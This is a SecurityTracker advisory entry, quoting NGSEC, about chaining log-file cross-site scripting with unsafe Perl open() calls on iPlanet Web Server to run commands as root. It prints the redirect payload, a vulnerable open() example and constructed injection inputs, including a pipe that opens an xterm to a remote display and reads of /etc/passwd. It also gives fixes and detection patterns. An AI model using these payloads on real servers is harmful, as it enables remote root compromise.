SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Sun ONE/iPlanet Web Server
Vendors:   Sun
Sun iPlanet Web Server Cross-Site Scripting and Unsafe Perl Script open() Calls Let Remote Users Execute Commands on the Server
SecurityTracker Alert ID:  1005656
SecurityTracker URL:  http://securitytracker.com/id/1005656
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Nov 19 2002
Impact:   Execution of arbitrary code via network, Root access via network
Exploit Included:  Yes  
Version(s): 4.* up to SP11
Description:   Two vulnerabilities were reported in Sun's iPlanet Web Server. A remote user can execute commands on the target server.

Next Generation Security Technologies issued an advisory warning that a remote user can exploit a combination of the two flaws to execute commands on the server, typically with root level privileges.

One flaw is an input validation flaw that permits cross-site scripting attacks. The other flaw is a series of unsafe open() function calls in the Admin Server Perl scripts.

To trigger the exploit, the administrator must review the web server's log files through the iPlanet Admin Server.

In the first flaw, it is reported that the web server does not filter HTML code when writing to the log files. A remote user can create a specially crafted URL that will cause HTML code to be written to the log files. Then, when an administrator views the log files, arbitrary scripting code will be executed by the target administrator's browser. The code will originate from the site running the iPlanet software and will run in the security context of that site. As a result, the code will be able to access the target administrator's cookies (including authentication cookies) associated with the site, access data recently submitted by the target administrator via web form to the site, or take actions on the site acting as the administrator user.
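The handling the log viewer lacked, as an added example written for this entry (it is not iPlanet code and not part of the NGSEC advisory): every log line is HTML-escaped before it is rendered, and a scan flags lines that carry markup, including URL-encoded markup as it appears in a request line. The log lines are constructed for the example in common-log style; iPlanet's actual log format and the viewer's code are not on this page, and the function names are the example's own.

```perl
#!/usr/bin/perl
# Added example, not code from iPlanet or NGSEC: a log viewer must treat
# log lines as untrusted text.  Escape before rendering, and flag lines
# that already carry markup.
use strict;
use warnings;

# Escape the five characters that let log data become HTML or break out
# of an attribute when the log is shown in a browser.
sub html_escape {
    my ($s) = @_;
    my %map = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$map{$1}/g;
    return $s;
}

# Render one log line the way a safe viewer would: escaped, inside <pre>.
sub render_line {
    my ($line) = @_;
    return '<pre>' . html_escape($line) . "</pre>\n";
}

# Flag lines that carry markup an unescaped viewer would execute: tags,
# event-handler attributes and javascript: URLs.  The line is checked
# both as logged and after %XX decoding, because a request line is
# usually logged in its URL-encoded form.
sub looks_injected {
    my ($line) = @_;
    (my $decoded = $line) =~ s/%([0-9A-Fa-f]{2})/chr hex $1/ge;
    for my $s ($line, $decoded) {
        return 1 if $s =~ m{<\s*/?\s*(script|img|iframe|svg|body|object)\b}i;
        return 1 if $s =~ m{\bon[a-z]+\s*=}i;
        return 1 if $s =~ m{javascript\s*:}i;
    }
    return 0;
}

# Constructed sample lines in common-log style (not real iPlanet logs).
# The second carries the advisory's redirect payload verbatim; the third
# carries a URL-encoded image tag with an event handler.
my @log = (
    '10.0.0.5 - - [19/Nov/2002:10:01:02 -0500] "GET /index.html HTTP/1.0" 200 1024',
    '10.0.0.9 - - [19/Nov/2002:10:02:17 -0500] "GET /<script>window.location="/https-admserv/bin/perl/importInfo?dir=|id%00";</script> HTTP/1.0" 404 0',
    '10.0.0.9 - - [19/Nov/2002:10:02:40 -0500] "GET /%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.0" 404 0',
);

for my $line (@log) {
    my $verdict = looks_injected($line) ? 'SUSPECT' : 'ok     ';
    printf "%s %s", $verdict, render_line($line);
}
```

Escaping on output is the fix the viewer needed; the scan is a detection aid for reviewing logs that were written before the viewer was fixed, and a line flagged by it should be read in a plain text tool, not in a browser.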

The remote user can exploit this cross-site scripting flaw to cause the administrator's browser to call the vulnerable Admin Server Perl scripts and exploit the unsafe open() function calls. The injected script uses a relative URL, so the browser resolves it against the Admin Server the administrator is logged in to and sends the existing session credentials with the redirected request. Because the administrator will already be logged in (to view the log files), the Perl scripts can be invoked; they would otherwise require the administrator to log in before executing.

Some demonstration exploit code is provided:

<script>
window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
</script>
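To make the open() half of the chain concrete, here is an added example written for this entry (it is not the importInfo script, whose source is not on the page, and not NGSEC's exploit) showing the two-argument open() pattern that turns a leading '|' into a command, beside a hardened replacement. The base directory, the file name appended to dir, and the function names are assumptions.

```perl
#!/usr/bin/perl
# Added example (not the importInfo script, not NGSEC's exploit): the
# two-argument open() pattern the advisory describes, beside a hardened
# replacement.  Base directory and file name are assumed; the real
# script's values are not on the page.
use strict;
use warnings;

my $BASE = '/opt/iplanet/https-admserv/import';   # assumed

# VULNERABLE: two-argument open() lets the data choose the mode.  If $dir
# starts with '|', Perl opens a pipe to the command named by the rest of
# the string (through the shell when it contains metacharacters), and
# that command runs at open() time, before a single byte is read.  A NUL
# byte in the value ends the string at the C level, so "/info.txt"
# appended here never reaches the command line; that is what the %00 in
# the advisory's URL is for.
sub unsafe_import_info {
    my ($dir) = @_;
    my $path = "$dir/info.txt";                 # attacker controls the prefix
    open(my $fh, $path) or return "open failed: $!";   # mode taken from $path
    local $/;
    my $data = <$fh>;
    close $fh;
    return defined $data ? $data : '';
}

# HARDENED: validate the parameter against an allow-list (which also
# excludes '|', NUL and '/'), refuse '.' and '..', anchor the result under
# a fixed base directory, and use the three-argument form so the mode is
# fixed to read-only regardless of what the data contains.
sub safe_import_info {
    my ($dir) = @_;
    return (undef, 'missing dir')    unless defined $dir && length $dir;
    return (undef, 'bad characters') unless $dir =~ /\A[A-Za-z0-9_.-]+\z/;
    return (undef, 'path traversal') if $dir eq '.' || $dir eq '..';
    my $path = "$BASE/$dir/info.txt";
    open(my $fh, '<', $path) or return (undef, "open failed: $!");
    local $/;
    my $data = <$fh>;
    close $fh;
    return (defined $data ? $data : '', undef);
}

# Constructed inputs: a benign name, the advisory's payload shape, and a
# few variants an allow-list must also stop.
for my $dir ('config1',
             "|id\0",
             "|/usr/openwin/bin/xterm -display 10.0.0.9:0\0",
             '../../../etc/passwd',
             'config1; id',
             "cat /etc/passwd|") {
    my ($data, $err) = safe_import_info($dir);
    (my $shown = $dir) =~ s/\0/\\0/g;           # make the NUL visible
    printf "%-50s -> %s\n", "'$shown'", defined $err ? "rejected: $err" : 'opened';
}
```

Running it prints, for each constructed input, how the hardened function treats it; only 'config1' reaches open(), and it fails there only because the assumed base directory does not exist on the demo machine. The vulnerable function is shown for comparison and is not called with hostile input. On the Perl of iPlanet's era the bytes after the NUL were silently dropped; current Perl warns about embedded NUL bytes in system-call arguments, but the leading-'|' behaviour of two-argument open() is unchanged, so the three-argument form plus an allow-list remains the fix.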

A demonstration exploit script is available at:

http://www.ngsec.com/downloads/exploits/iplanet-ngxss.sh

For the original advisory, see:

http://www.ngsec.com/docs/advisories/NGSEC-2002-4.txt

Impact:   A remote user can cause the administrator's browser, when the administrator views the log files through the Admin Server, to invoke an Admin Server Perl script that executes arbitrary shell commands on the server, typically with root privileges.
Solution:   No solution was available at the time of this entry.

NGSEC indicates that you can upgrade to iPlanet v.6.* to avoid this vulnerability. According to the report, the cross-site scripting flaw was fixed in version 6.

Vendor URL:  wwws.sun.com/software/products/web_srvr/home_web_srvr.html
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (HP/UX), UNIX (Solaris - SunOS), UNIX (Tru64), Windows (NT), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Sun Issues Fix) Re: Sun iPlanet Web Server Cross-Site Scripting and Unsafe Perl Script open() Calls Let Remote Users Execute Commands on the Server
Sun has released a fix.



 Source Message Contents

Subject:  [VulnWatch] iPlanet WebServer, remote root compromise


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1




                   Next Generation Security Technologies
                          http://www.ngsec.com
                            Security Advisory


       Title:   iPlanet WebServer, remote root compromise
          ID:   NGSEC-2002-4
 Application:   iPlanet WebServer 4.* up to SP11
        Date:   11/19/2002
      Status:   Vendor contacted on 09/28/2002, (Sun Microsystems).
 Platform(s):   Unix & Windows OSs.
    Location:   http://www.ngsec.com/docs/advisories/NGSEC-2002-4.txt


Overview:
- ----------

Under certain circumstances an attacker can execute commands (usually
as root), using the combination of two security vulnerabilities on
iPlanet Web Server 4.* up to SP11 (NG-XSS).

These two vulnerabilities are:

  - Insecure open() calls in Admin Server PERL scripts
  - Cross Site Scripting

The only requirement is, through social engineering, to have the
Administrator review the logs within the iPlanet Admin Server.

This vulnerability cannot be exploited on a 6.* version because the XSS
was silently fixed in these releases.

Find a detailed vulnerability analysis of NG-XSS on iPlanet WebServers
in our WhitePaper "iPlanet NG-XSS Vulnerability Analysis" at:

       http://www.ngsec.com/ngresearch/ngwhitepapers/


Technical description:
- -----------------------

If we consider each vulnerability alone, we have no chance to execute
commands at the iPlanet Web Server, since the XSS payload only hijacks
the browser and the vulnerable PERL script is protected by an
authentication scheme.

iPlanet Web Server suffers from an XSS vulnerability when the Administrator
reviews the error logs through the iPlanet Admin Server. The XSS triggers
once the Administrator has successfully logged on to the Admin Server.

The trick is not to exploit the open() PERL vulnerability directly, but
to use the XSS to redirect the Administrator's browser to the URL
that will cause the open() command injection.
Since he is already authenticated, we bypass the authentication scheme.

We will use the following Javascript code:

<script>
window.location="/https-admserv/bin/perl/importInfo?dir=|<command>%00";
</script>


Proof of vulnerability:
- ------------------------

Find an exploit for this vulnerability at:

       http://www.ngsec.com/ngresearch/ngadvisories/

There is a case study exploitation (sending the attacker an xterm), with
some screenshots, in the above-mentioned WhitePaper.


Recommendations:
- -----------------
Avoid using iPlanet's Admin Server until Sun releases a patch for
these vulnerabilities. Alternatively, upgrade to iPlanet v.6.*.

This vulnerability could not have been exploited on a NGSecureWeb(r)
protected iPlanet Web Server.

Find more information on NGSecureWeb features at:

      http://www.ngsec.com/ngproducts/ngsw/

- --
More security advisories at: http://www.ngsec.com/ngresearch/ngadvisories/
PGP Key: http://www.ngsec.com/pgp/labs.asc

Copyright(c) 2002 NGSEC. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE92XIKKrwoKcQl8Y4RAuXSAJwNS9/YzjFxvB4ZZ3taRMCtoqdZ6ACfXO4z
SiYhxDlBjC01gcs9BabvSkc=
=3aXf
-----END PGP SIGNATURE-----
Copyright 2019, SecurityGlobal.net LLC